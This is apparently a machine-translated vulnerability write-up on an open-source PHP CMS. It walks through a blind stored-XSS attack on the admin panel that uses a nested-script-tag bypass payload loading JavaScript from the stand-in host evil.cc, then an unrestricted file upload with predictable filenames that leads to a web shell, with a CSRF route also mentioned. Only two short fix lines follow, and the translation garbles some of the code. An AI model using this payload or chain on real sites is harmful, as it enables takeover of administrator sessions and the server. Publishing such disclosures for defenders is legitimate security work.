An open-source CMS bypass filtering XSS blind hitting + getshell

An open-source CMS bypass filtering XSS blind hitting + getshell

For the latest version 1.8, first follow/comment. php:

 

If ($ action = "save") {$ msgtitle = $ _ POST ["msgtitle"]; $ msgname = $ _ POST ["msgname"]; $ msgcontact = $ _ POST ["msgcontact"]; $ msgcontent = $ _ POST ["msgcontent"]; ...... .................... $ msgcontent = safeCheck ($ msgcontent); $ userip = $ _ SERVER ["REMOTE_ADDR"]; $ SQL = "INSERT INTO yiqi_comments (cid, title, name, contact, content, ip, adddate )". "VALUES (NULL, '$ msgtitle', '$ msgname', '$ msgcontact', '$ msgcontent', '$ userip', null )"; $ result = $ yiqi_db-> query (CheckSql ($ SQL); if ($ result = 1) {ShowMsg ("message added successfully ");}

We can see the safecheck function, but obviously only calls the content, so the title of the message is changed to an xss.

However, the 30-character limit is really a weakness, So we focus on the safecheck function.

/Include/common. func. php
 

Function safeCheck ($ str) {$ farr = array ("/<(\/?) (Script | I? Frame | style | html | body | title | link | meta | \? | \ %) ([^>] *?)> /IsU ", // filter <script and other code that may introduce malicious content or maliciously change the display layout. If you do not need to insert flash, you can also add <object filtering "/(<[^>] *) on [a-zA-Z] + \ s * = ([^>] *>) /isU ", // filter javascript on events); $ tarr = array (" "," ",); $ str = preg_replace ($ farr, $ tarr, $ str); return $ str ;}

Everyone knows this.

Oh, God. Isn't that common <scr <script> ipt> bypass?

Therefore, the <scr <script> EPT src = http://evil.cc/evil.js> </scr <script>
 

No escape operation is performed when data is taken out.

/Admin/comments. php
 

$ Cid = $ _ GET ["cid"]; $ cid = (isset ($ cid) & is_numeric ($ cid ))? $ Cid: 0; $ commentdata = new Comments; $ commentinfo = $ commentdata-> GetComment ($ cid );....... <tr> <td class = "label"> message content </td> <td class = "input"> <? Php echo $ commentinfo-> content;?> </Td> </tr>

The background scene
 

Malicious js loaded
 

So far, it is playing the background blindly, followed by getshell

Fortunately, I found a place where I could upload objects.
 

Next Look at admin/product-add.php
 

if(!empty($_FILES["productthumb"]["name"])){    require_once("../include/upload.class.php");    $filedirectory = YIQIROOT."/uploads/image";    $filename = date("ymdhis");    $filetype = $_FILES['productthumb']['type'];    $upload = new Upload;    $upload->set_max_size(1800000);     $upload->set_directory($filedirectory);    $upload->set_tmp_name($_FILES['productthumb']['tmp_name']);    $upload->set_file_size($_FILES['productthumb']['size']);    $upload->set_file_ext($_FILES['productthumb']['name']);     $upload->set_file_type($filetype);     $upload->set_file_name($filename);         $upload->start_copy();         if($upload->is_ok())    {        $productthumb = YIQIPATH."uploads/image/".$filename.'.'.$upload->user_file_ext;    }    else    {        exit($upload->error());    }}

There is no type restriction. You can see $ filename = date ("ymdhis"); you can directly capture the package, and the file name is ymdhis.

If it is too troublesome, you can go back to the foreground and get the shell address directly.
 

Getshell
 

Of course, XSRF getshell can be used directly because no CSRF limit is set here.

Solution:

Improved filtering mechanism

Restrict upload types